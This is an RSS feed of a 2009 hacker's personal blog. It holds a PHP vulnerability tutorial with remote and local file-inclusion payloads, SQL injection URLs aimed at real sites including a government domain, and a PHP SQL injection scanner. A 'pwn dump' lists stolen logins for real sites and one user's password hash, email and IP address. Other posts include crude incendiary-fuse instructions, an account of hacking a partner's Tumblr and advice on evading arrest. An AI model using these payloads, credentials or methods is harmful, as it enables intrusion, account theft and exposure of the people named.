Blood - Rss Feed

Finding Vulnerabilities in PHP scripts

Blood — Tue, 06 Oct 2009 19:10:58 GMT

[NOTE] if you see ***** that means it's sensored. It's most likely the word admin so just replace it.

1) About
2) Some stuff
3) Remote File Inclusion
3.0 - Basic example
3.1 - Simple example
3.2 - How to fix
4) Local File Inclusion
4.0 - Basic example
4.1 - Simple example
4.2 - How to fix
5) Local File Disclosure/Download
5.0 - Basic example
5.1 - Simple example
5.2 - How to fix
6) SQL Injection
6.0 - Basic example
6.1 - Simple example
6.2 - SQL Login Bypass
6.3 - How to fix
7) Insecure Cookie Handling
7.0 - Basic example
7.1 - Simple example
7.2 - How to fix
8) Remote Command Execution
8.0 - Basic example
8.1 - Simple example
8.2 - Advanced example
8.3 - How to fix
9) Remote Code Execution
9.0 - Basic example
9.1 - Simple example
9.2 - How to fix
10) Cross-Site Scripting
10.0 - Basic example
10.1 - Another example
10.2 - Simple example
10.3 - How to fix
11) Authentication Bypass
11.0 - Basic example
11.1 - Via login variable
11.2 - Unprotected ***** CP
11.3 - How to fix
12) Insecure Permissions
12.0 - Basic example
12.1 - Read the users/passwords
12.2 - Download backups
12.3 - INC files
12.4 - How to fix
13) Cross Site Request Forgery
13.0 - Basic example
13.1 - Simple example
13.2 - How to fix
14) Shoutz

1) In this tutorial I will show you how you can find vulnerabilities in php scripts.I will not explain
how to exploit the vulnerabilities,it is pretty easy and you can find info around the web.All the
examples without the basic example of each category was founded in different scripts.

2) First,install Apache,PHP and MySQL on your computer.Addionally you can install phpMyAdmin.
You can install WAMP server for example,it has all in one..Most vulnerabilities need special conditions
to work.So you will need to set up properly the PHP configuration file (php.ini) .I will show you what
configuration I use and why :

safe_mode = off ( a lot of shit cannot be done with this on )
disabled_functions = N/A ( no one,we want all )
register_globals = on ( we can set variables by request )
allow_url_include = on ( for lfi/rfi )
allow_url_fopen = on ( for lfi/rfi )
magic_quotes_gpc = off ( this will escape ' " \ and NUL's with a backslash and we don't want that )
short_tag_open = on ( some scripts are using short tags,better on )
file_uploads = on ( we want to upload )
display_errors = on ( we want to see the script errors,maybe some undeclared variables? )

How to proceed : First,create a database to be used by different scripts.Install the script on
localhost and start the audit over the source code.If you found something open the web browser and
test it,maybe you are wrong.

3) Remote File Inclusion

- Tips : You can use the NULLBYTE and ? trick.
You can use HTTPS and FTP to bypass filters ( http filtered )

In PHP is 4 functions through you can include code.

require - require() is identical to include() except upon failure it will produce a fatal E_ERROR level error.
require_once - is identical to require() except PHP will check if the file has already been included, and if so, not include (require) it again.
include - includes and evaluates the specified file.
include_once - includes and evaluates the specified file during the execution of the script.

3.0 - Basic example

- Tips : some scripts don't accept "http" in variables,"http" word is forbbiden so
you can use "https" or "ftp".

- Code snippet from test.php

-----------------------------------------------
$pagina=$_GET['pagina'];
include $pagina;
?>
-----------------------------------------------

- If we access the page we got some errors and some warnings( not pasted ) :

Notice: Undefined index: pagina in C:\wamp\www\test.php on line 2

- We can see here that "pagina" variable is undeclared.We can set any value to "pagina" variable.Example :

http://127.0.0.1/test.php?pagina=htt...evilscript.txt

Now I will show why some people use ? and %00 after the link to the evil script.

# The "%00"

- Code snippet from test.php

-----------------------------------------------
$pagina=$_GET['pagina'];
include $pagina.'.php';
?>
-----------------------------------------------

- So if we will request

http://127.0.0.1/test.php?pagina=htt...evilscript.txt

Will not work because the script will try to include http://evilsite.com/evilscript.txt.php

So we will add a NULLBYTE ( %00 ) and all the shit after nullbyte will not be taken in
consideration.Example :

http://127.0.0.1/test.php?pagina=htt...lscript.txt%00

The script will successfully include our evilscript and will throw to junk the things
after the nullbyte.

# The "?"

- Code snippet from test.php

-----------------------------------------------
$pagina=$_GET['pagina'];
include $pagina.'logged=1';
?>
-----------------------------------------------

And the logged=1 will become like a variable.But better use nullbyte.Example :

http://127.0.0.1/test.php?pagina=htt...t.txt?logged=1

The evilscript will be included succesfully.

3.1 - Simple example

Now an example from a script.

- Code snippet from index.php

----------------------------------------------------
if (isset($_REQUEST["main_content"])){
$main_content = $_REQUEST["main_content"];
} else if (isset($_SESSION["main_content"])){
$main_content = $_SESSION["main_content"];
}
.......................etc..................
ob_start();
require_once($main_content);
----------------------------------------------------

We can see that "main_content" variable is requested by $_REQUEST method.The attacker can
set any value that he want. Below the "main_content" variable is include.So if we make the
following request :

http://127.0.0.1/index.php?main_cont...evilscript.txt

Our evil script will be successfully included.

3.2 - How to fix

Simple way : Don't allow special chars in variables.Simple way : filter the slash "/" .
Another way : filter "http" , "https" , "ftp" and "smb".

4) Local File Inclusion

- Tips : You can use the NULLBYTE and ? trick.
../ mean a directory up
On Windows systems we can use "..\" instead of "../" .The "..\" will become "..%5C" ( urlencoded ).

The same functions which let you to include (include,include_once,require,require_once) .

4.0 - Basic example

- Code snippet from test.php

-----------------------------------
$pagina=$_GET['pagina'];
include '/pages/'.$pagina;
?>
-----------------------------------

Now,we can not include our script because we can not include remote files.We can include only
local files as you see.So if we make the following request :

http://127.0.0.1/test.php?pagina=../.../../etc/passwd

The script will include "/pages/../../../../../../etc/passwd" successfully.

You can use the %00 and ? .The same story.

4.1 - Simple example

- Code snippet from install/install.php

-------------------------------------
if(empty($_GET["url"]))
$url = 'step_welcome.php';
else
$url = $_GET["url"];
.............etc.............

-------------------------------------

Pussies. (Not female)

Blood — Wed, 30 Sep 2009 21:09:35 GMT

So my mother got this new boyfriend right. This dude is really nice, treats her right and all. (By the way i'm venting so don't flame Just thought I should share how I feel about bitches.) So a quick background of me and my mother to help you understand, When I was born my rich dad left blah blah, my mom had no education so she became a stripper so she could feed me. We had no family and aall that nonsense. After abusive relationship after abusive relationship we finally found this really nice guy for her. So i'm staying with them at the moment. My mom's a heavy alcoholic and one night i'm in my room, and I hear "Owwww ];" like a litle girl crying almost. Then I hear my moms boyfriends 300 pound ass jogging through the hall to my room and he opens my door and is like
"Christian! Help, your moms going crazy".
I've dealt with my mom before so I grab her by the arm and pull her into my room, shut the door and light a cig for her. The whole time she's trying to open the door and yelling "He wants to fuck me in the ass, he's a fucking faggot, he likes buttholes" and im laughing my ass off. Me, being stressed out pull out a sack of weed and start smokin some afgan kush. Well, I later find out when I got my mom in my room my step dad RAN, like RANNN into his room slammed the door and locked it, then locked his patio door and locked all his windows. So here it is, 5 o clock in the morning and I haven't slept and his fat ass is dreamin away while he makes ME take care of his problem. Yes it's my mom, but he knew she was like this when he started datin her, i've been doin this shit my whole life, can not one guy just man up besides me for once? He calls me hunny and sweetheart all the time and basically he is just a big pussy. I've lived in detroit, and miami, and phoenix az. and I have to say, I have never met such a big flaming fat double chin having nice friendly pussy ass bitch, in my whole life. [:

anyway like I said don't be hatin, I just thought I should share this with some of the people on here who have been through the same shit as me and understand this dude is a big fucking PUSSY. And it frustrates me.
Thanks for readin this if you did lmao

Guess who's back

Blood — Sun, 20 Sep 2009 05:42:27 GMT

http://elkotob.com/news.php?id=-1+un...m+mysql.user--

http://bitlis.meb.gov.tr/hb.php?id=-...ion()),3,4,5,6

meow.

My Favorite Songs.

Blood — Sun, 07 Jun 2009 05:20:05 GMT

Warning : Not for little ears.
TEST
[youtube]
******* src="http://www.youtube.com/v/kagDYw8g1H8&hl=en&fs=1&&autoplay=1" type="application/x-shockwave-flash" allowscriptaccess="always" allowfullscreen="true" width="425" height="25">[/youtube]
[youtube]
******* src="http://www.youtube.com/v/2tzSjtuMGOQ&hl=en&fs=1&color1=0x5d1719&color2=0xcd 311b" type="application/x-shockwave-flash" allowscriptaccess="always" allowfullscreen="true" width="425" height="344">[/youtube]
[youtube]
******* src="http://www.youtube.com/v/vfhVbEaMQEg&hl=en&fs=1&color1=0x234900&color2=0x4e 9e00" type="application/x-shockwave-flash" allowscriptaccess="always" allowfullscreen="true" width="425" height="344">[/youtube]
[youtube]
******* src="http://www.youtube.com/v/ZwxLL1gtJbA&hl=en&fs=1&color1=0x234900&color2=0x4e 9e00" type="application/x-shockwave-flash" allowscriptaccess="always" allowfullscreen="true" width="425" height="344">
[/youtube]

More coming soon!

How to make a pull pin fuse.

Blood — Sun, 07 Jun 2009 04:27:34 GMT

EZ.
Thanks Blood.
Anyway get a box of matches. Stick the matches together with the heads facing up and one or two facing down. Take a paperclip and make a ring. Cut off the strip of paper from the box that you strike the matches on. Put it on it so the middle of the strike board is on the top of the matches and so that the rest of it comes down on the side. Attach the paperclip. And get creative to do the rest.

SQL Injection Scanner - PHP -

Blood — Sun, 07 Jun 2009 04:23:47 GMT

#PHP SQL Injection Scanner.
#BTW: IP = Fail Proxy = Win.

$http = '';

if($http == '')
die("Http is empty!\n\nSo go suck a dick skid.\n# ");

echo "Scan for : $http \n\n";

$http = (substr($http, -1) != '/') ? $http.'/' : $http;
$found = getGet();

function getGet()
{
global $http;

$getN = array();
$fenN = array();

$htm = @file_get_contents($http);
@preg_match_all('/((\/[a-zA-Z0-9]+\/)|)([a-zA-Z0-9]+\.[a-zA-Z0-9]+\?)([a-zA-Z0-9]+)(\s*\=)([a-zA-Z0-9]+)/im', $htm, $gets);

foreach($gets[0] as $get)
{
$get = str_replace($http, '', $get);

if(!in_array($get, $getN))
{
@preg_match_all('/(.*)(\?)/', $get, $gn);
$name = str_replace('?', '', $gn[1][0]);

if(!@in_array($name, $fenN) && @in_array(substr(strrchr($name, "."), 1), array('php', 'asp', 'aspx'))){
$getN[] = $get;
$fenN[] = $name;
}
}
}
return $getN;
}

foreach($found as $get)
{
$address = $http.$get;

$htm1 = @file_get_contents($address);
$htm2 = @file_get_contents($address.'%20and%20\'a\'%20=%20 \'a\'');

if($htm1 == $htm2)
echo $get." SQL injection! \n";
else
echo $get." Failed! \n";

}

echo "\n\nWhat a useless thing.\n";

?>

Insecure Girlfriend.

Blood — Fri, 05 Jun 2009 03:47:33 GMT

So i've got this insecure girlfriend right. I had like 800 friends on myspace and she bitches about it all the time.
I really like her so I say, Fuck it and delete my myspace.
I make a new one that i'm only allowed to add her, and friends on (guys). so i say what the fuck ever idc myspace is gay so I do that. Then, i find out this bitch uses tumblr. So I hack her tumblr and what do I find? 260 guys added. Then i go to her myspace friends and there are like 5 guys. Then I go to her face book and there are a shit load.

What a fucking hypocrite.
Not to mention i'm moving from Arizona to fucking hicktown Kansas for this bitch, And she cant even fucking do as she says?

I've got

Blood — Fri, 05 Jun 2009 02:14:28 GMT

A Microsoft 2003 server. I don't have the ID or Password to get in, Anyone know any vulns or any ways to get in?

Blood's pwn dump ;x

Blood — Thu, 04 Jun 2009 20:56:36 GMT

Dont ask any questions, If you don't know how to use any of this then you shouldn't have it anyway.
Dont use this shit without posting a reply.
And if anyone flames or is fucking negative at all i'll take this off and stop updating this.
Thanks. <3

http://www.salam-co.com/*****/
salam
123
------------------------------------------------------------------------
http://www.houseandhouse.it/gestisci/login.asp
admin
onebl00d
the language is Italian and the page says "This server is managed by Ciociariaweb Snc
:: The site you are looking for is in a configuration:
Please Wait ... you will be returned to the official site
Ciociariaweb Snc:: 2007::"
------------------------------------------------------------------------
http://www.scarpettacarrelli.com/db/login.asp
User: eurolift
Password: onebl00d
------------------------------------------------------------------------
http://www.raisinggodlytomatoes.com/ubbthreads/
USER_ID: 2
USER_LOGIN_NAME: Shane32
USER_DISPLAY_NAME: Shane32
USER_PASSWORD: 81dc9bdb52d04dc20036dbd8313ed055
USER_CRACKED_PASS: 1234
USER_MEMBERSHIP_LEVEL: Administrator
USER_REGISTRATION_EMAIL: shane@sackcorp.com
USER_REGISTRATION_IP: 68.41.135.16
USER_SESSION_ID: c6a01432c8138d46ba39957a8250e027
USER_IS_APPROVED: yes

Basic Hacking Tutorial 1

Blood — Sat, 30 May 2009 22:23:36 GMT

First off, You really need to think about what you wish to accomplish by hacking. Hacking is a term that has so many different definitions and could have endless tutorials, because hacking is a generalized word. Basically, "Hacking" means Gaining unauthorized access to a program/website/database/server/computer/etc. with the motive of gaining. Whether it be gaining popularity amongst underground hackers or gaining money from a fraud, Hacking is about gain.
(Since I know i'll get flamed for this I know a "Hacker" is about wanting to learn, But everyone here is smart enough to know that when someone thinks of a "hacker" the last thing they think about is learning. They think about stealing, and well, "Hacking".

Before I teach you the basics of what I know, I'm going to teach you how not to be a fucking retard. First of all, If something looks like a trap, It's a trap. It needs to be a trap in your eyes whether it is or not, Because in hacking you have to lose some to win some. And if you don't want to be the next Hacker turned Prison Bitch then follow these simple guidelines.
1. Don't hack for popularity.
2. Don't hack "accidently".
3. Don't brag to other hackers about how good you are at hacking, Because chances are someone there is better, And will show you that.
4. Don't tell people who know you in real life your hacking alias.
(Example) Lets say you go to a school and a group of kids ask you if you've ever hacked before. You say yes, you hacked www.insurance-fla.com and your nickname is Blood. You then get in a fight for kissing the kids bestfriends girlfriend, He narks on you and you go down along with your alias.

Now that we are done with the *****g shit lets get the basics.

What do I need? -(Compliments to Jolly Roger)
*A Computer
*A Modem (Device that uses phone lines to transfer Data)
*The Phone number - You can get this by scanning, or Directory Assistance. Directory assistance only works if you know where the target machine is.
*Answer to identity elements.

So to teach you i'm going to act as if you are using the Directory assistance method.
Call 411 and say *City*, Then say SRI, write down the numbers, Ask if there are any more if so write them down, Dial the numbers and listen for a carrier tone, If you hear them dial them on your modem and viola, Your set to hack.
-Anarchists Cookbook-